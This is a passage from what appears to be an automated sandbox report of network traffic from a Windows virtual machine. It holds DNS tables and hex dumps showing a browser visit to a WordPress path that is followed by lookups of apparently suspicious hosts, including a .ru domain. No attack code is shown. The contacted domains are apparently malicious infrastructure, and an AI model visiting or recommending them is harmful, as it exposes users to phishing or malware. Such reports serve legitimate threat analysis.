                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.397643089 CET53510031.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.397854090 CET53555061.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.479609013 CET5736353192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.480000973 CET5254153192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.487770081 CET53573631.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.489092112 CET53525411.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.334280014 CET5091353192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.334398031 CET6295553192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.341612101 CET53509131.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.343822002 CET53629551.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.708508015 CET6027153192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.708645105 CET6296553192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.721961975 CET53629651.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.722023964 CET53602711.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.261847973 CET5279553192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.262258053 CET6529753192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.265783072 CET53558961.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.275255919 CET53652971.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.399718046 CET53527951.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:25.605716944 CET53641601.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:48.125258923 CET53589781.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:48.230679989 CET53648551.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:51.181813955 CET53654751.1.1.1192.168.2.6
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Feb 11, 2025 16:26:52.802133083 CET192.168.2.61.1.1.10x8adaStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:26:52.802299976 CET192.168.2.61.1.1.10x3a11Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:26:54.415600061 CET192.168.2.61.1.1.10xac4bStandard query (0)handymanproservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:26:54.415730000 CET192.168.2.61.1.1.10xc406Standard query (0)handymanproservices.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.638556957 CET192.168.2.61.1.1.10x870dStandard query (0)8l.dichotomou8.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.638756037 CET192.168.2.61.1.1.10xd540Standard query (0)8l.dichotomou8.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.809851885 CET192.168.2.61.1.1.10xda2dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.809984922 CET192.168.2.61.1.1.10xd210Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.810713053 CET192.168.2.61.1.1.10x194fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.811084986 CET192.168.2.61.1.1.10x353aStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.811713934 CET192.168.2.61.1.1.10xd988Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.811949015 CET192.168.2.61.1.1.10xe373Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.721669912 CET192.168.2.61.1.1.10x788Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.721996069 CET192.168.2.61.1.1.10xd7f6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.761250019 CET192.168.2.61.1.1.10xc91aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.761532068 CET192.168.2.61.1.1.10xf20fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.390249968 CET192.168.2.61.1.1.10x4bf4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.390661001 CET192.168.2.61.1.1.10xc549Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.479609013 CET192.168.2.61.1.1.10x940aStandard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.480000973 CET192.168.2.61.1.1.10x7a85Standard query (0)developers.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.334280014 CET192.168.2.61.1.1.10xad61Standard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.334398031 CET192.168.2.61.1.1.10xe2bcStandard query (0)developers.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.708508015 CET192.168.2.61.1.1.10xbb79Standard query (0)ajcs6.revishbos.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.708645105 CET192.168.2.61.1.1.10x5716Standard query (0)ajcs6.revishbos.ru65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.261847973 CET192.168.2.61.1.1.10x398dStandard query (0)ajcs6.revishbos.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.262258053 CET192.168.2.61.1.1.10xb5ecStandard query (0)ajcs6.revishbos.ru65IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Feb 11, 2025 16:26:52.808736086 CET1.1.1.1192.168.2.60x3a11No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:26:52.808995008 CET1.1.1.1192.168.2.60x8adaNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:26:54.599780083 CET1.1.1.1192.168.2.60xac4bNo error (0)handymanproservices.com66.29.153.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.654545069 CET1.1.1.1192.168.2.60xd540No error (0)8l.dichotomou8.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.659410954 CET1.1.1.1192.168.2.60x870dNo error (0)8l.dichotomou8.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.659410954 CET1.1.1.1192.168.2.60x870dNo error (0)8l.dichotomou8.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818873882 CET1.1.1.1192.168.2.60xda2dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818873882 CET1.1.1.1192.168.2.60xda2dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818873882 CET1.1.1.1192.168.2.60xda2dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818873882 CET1.1.1.1192.168.2.60xda2dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818885088 CET1.1.1.1192.168.2.60x194fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818885088 CET1.1.1.1192.168.2.60x194fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.819751024 CET1.1.1.1192.168.2.60x353aNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.820080996 CET1.1.1.1192.168.2.60xd988No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.820080996 CET1.1.1.1192.168.2.60xd988No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.820095062 CET1.1.1.1192.168.2.60xe373No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.728538036 CET1.1.1.1192.168.2.60x788No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.728538036 CET1.1.1.1192.168.2.60x788No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.728818893 CET1.1.1.1192.168.2.60xd7f6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.769136906 CET1.1.1.1192.168.2.60xc91aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.769136906 CET1.1.1.1192.168.2.60xc91aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.769136906 CET1.1.1.1192.168.2.60xc91aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.769136906 CET1.1.1.1192.168.2.60xc91aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.397643089 CET1.1.1.1192.168.2.60xc549No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.397854090 CET1.1.1.1192.168.2.60x4bf4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.397854090 CET1.1.1.1192.168.2.60x4bf4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.487770081 CET1.1.1.1192.168.2.60x940aNo error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.487770081 CET1.1.1.1192.168.2.60x940aNo error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.487770081 CET1.1.1.1192.168.2.60x940aNo error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.487770081 CET1.1.1.1192.168.2.60x940aNo error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.487770081 CET1.1.1.1192.168.2.60x940aNo error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.489092112 CET1.1.1.1192.168.2.60x7a85No error (0)developers.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.341612101 CET1.1.1.1192.168.2.60xad61No error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.341612101 CET1.1.1.1192.168.2.60xad61No error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.341612101 CET1.1.1.1192.168.2.60xad61No error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.341612101 CET1.1.1.1192.168.2.60xad61No error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.341612101 CET1.1.1.1192.168.2.60xad61No error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.343822002 CET1.1.1.1192.168.2.60xe2bcNo error (0)developers.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.721961975 CET1.1.1.1192.168.2.60x5716No error (0)ajcs6.revishbos.ru65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.722023964 CET1.1.1.1192.168.2.60xbb79No error (0)ajcs6.revishbos.ru104.21.2.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.722023964 CET1.1.1.1192.168.2.60xbb79No error (0)ajcs6.revishbos.ru172.67.186.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.275255919 CET1.1.1.1192.168.2.60xb5ecNo error (0)ajcs6.revishbos.ru65IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.399718046 CET1.1.1.1192.168.2.60x398dNo error (0)ajcs6.revishbos.ru172.67.186.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.399718046 CET1.1.1.1192.168.2.60x398dNo error (0)ajcs6.revishbos.ru104.21.2.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:28:13.113404036 CET1.1.1.1192.168.2.60xed26No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:28:13.113404036 CET1.1.1.1192.168.2.60xed26No error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:28:13.113404036 CET1.1.1.1192.168.2.60xed26No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Feb 11, 2025 16:28:13.113404036 CET1.1.1.1192.168.2.60xed26No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            • handymanproservices.com
                                                                                                                                                                                                                            • https:
                                                                                                                                                                                                                              • 8l.dichotomou8.com
                                                                                                                                                                                                                              • code.jquery.com
                                                                                                                                                                                                                              • challenges.cloudflare.com
                                                                                                                                                                                                                              • cdnjs.cloudflare.com
                                                                                                                                                                                                                              • developers.cloudflare.com
                                                                                                                                                                                                                              • ajcs6.revishbos.ru
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            0192.168.2.64971540.113.110.67443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:26:42 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 67 44 6e 48 50 4e 41 35 5a 45 36 64 6a 63 58 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 35 30 35 65 36 31 65 38 65 35 30 32 65 33 35 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: gDnHPNA5ZE6djcXx.1Context: 1505e61e8e502e35
                                                                                                                                                                                                                            2025-02-11 15:26:42 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                            2025-02-11 15:26:42 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 67 44 6e 48 50 4e 41 35 5a 45 36 64 6a 63 58 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 35 30 35 65 36 31 65 38 65 35 30 32 65 33 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 34 57 66 47 6c 32 58 49 35 78 72 43 43 49 72 79 6f 38 59 4d 57 42 67 62 69 6b 7a 4b 30 72 32 36 48 5a 55 42 39 71 70 64 33 5a 58 76 7a 56 7a 48 33 2b 76 52 30 73 33 41 39 6e 54 52 70 50 73 5a 61 66 63 77 77 63 68 78 72 76 4b 76 67 39 58 2b 34 43 63 4a 66 6a 56 41 66 4f 42 55 6d 6d 50 74 44 48 69 72 34 30 51 6e 67 55 50 6c
                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gDnHPNA5ZE6djcXx.2Context: 1505e61e8e502e35<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAT4WfGl2XI5xrCCIryo8YMWBgbikzK0r26HZUB9qpd3ZXvzVzH3+vR0s3A9nTRpPsZafcwwchxrvKvg9X+4CcJfjVAfOBUmmPtDHir40QngUPl
                                                                                                                                                                                                                            2025-02-11 15:26:42 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 67 44 6e 48 50 4e 41 35 5a 45 36 64 6a 63 58 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 35 30 35 65 36 31 65 38 65 35 30 32 65 33 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: gDnHPNA5ZE6djcXx.3Context: 1505e61e8e502e35<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                            2025-02-11 15:26:42 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                            2025-02-11 15:26:42 UTC58INData Raw: 4d 53 2d 43 56 3a 20 57 32 38 6f 49 53 43 42 4f 30 69 6c 65 58 79 68 4a 70 2b 51 45 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                            Data Ascii: MS-CV: W28oISCBO0ileXyhJp+QEw.0Payload parsing failed.


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            1192.168.2.64971640.113.110.67443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:26:47 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 4e 38 67 6a 42 66 44 51 45 71 4f 79 54 2f 65 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 65 31 64 65 62 33 32 36 63 36 33 30 61 38 33 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: sN8gjBfDQEqOyT/e.1Context: be1deb326c630a83
                                                                                                                                                                                                                            2025-02-11 15:26:47 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                            2025-02-11 15:26:47 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 4e 38 67 6a 42 66 44 51 45 71 4f 79 54 2f 65 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 65 31 64 65 62 33 32 36 63 36 33 30 61 38 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 34 57 66 47 6c 32 58 49 35 78 72 43 43 49 72 79 6f 38 59 4d 57 42 67 62 69 6b 7a 4b 30 72 32 36 48 5a 55 42 39 71 70 64 33 5a 58 76 7a 56 7a 48 33 2b 76 52 30 73 33 41 39 6e 54 52 70 50 73 5a 61 66 63 77 77 63 68 78 72 76 4b 76 67 39 58 2b 34 43 63 4a 66 6a 56 41 66 4f 42 55 6d 6d 50 74 44 48 69 72 34 30 51 6e 67 55 50 6c
                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: sN8gjBfDQEqOyT/e.2Context: be1deb326c630a83<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAT4WfGl2XI5xrCCIryo8YMWBgbikzK0r26HZUB9qpd3ZXvzVzH3+vR0s3A9nTRpPsZafcwwchxrvKvg9X+4CcJfjVAfOBUmmPtDHir40QngUPl
                                                                                                                                                                                                                            2025-02-11 15:26:47 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 4e 38 67 6a 42 66 44 51 45 71 4f 79 54 2f 65 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 65 31 64 65 62 33 32 36 63 36 33 30 61 38 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: sN8gjBfDQEqOyT/e.3Context: be1deb326c630a83<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                            2025-02-11 15:26:48 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                            2025-02-11 15:26:48 UTC58INData Raw: 4d 53 2d 43 56 3a 20 47 45 2b 52 50 4d 62 68 76 55 6d 4b 77 4b 68 50 4f 6f 32 63 6e 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                            Data Ascii: MS-CV: GE+RPMbhvUmKwKhPOo2cnA.0Payload parsing failed.


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            2192.168.2.64973166.29.153.2224436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:26:55 UTC678OUTGET /wp-includes/ HTTP/1.1
                                                                                                                                                                                                                            Host: handymanproservices.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
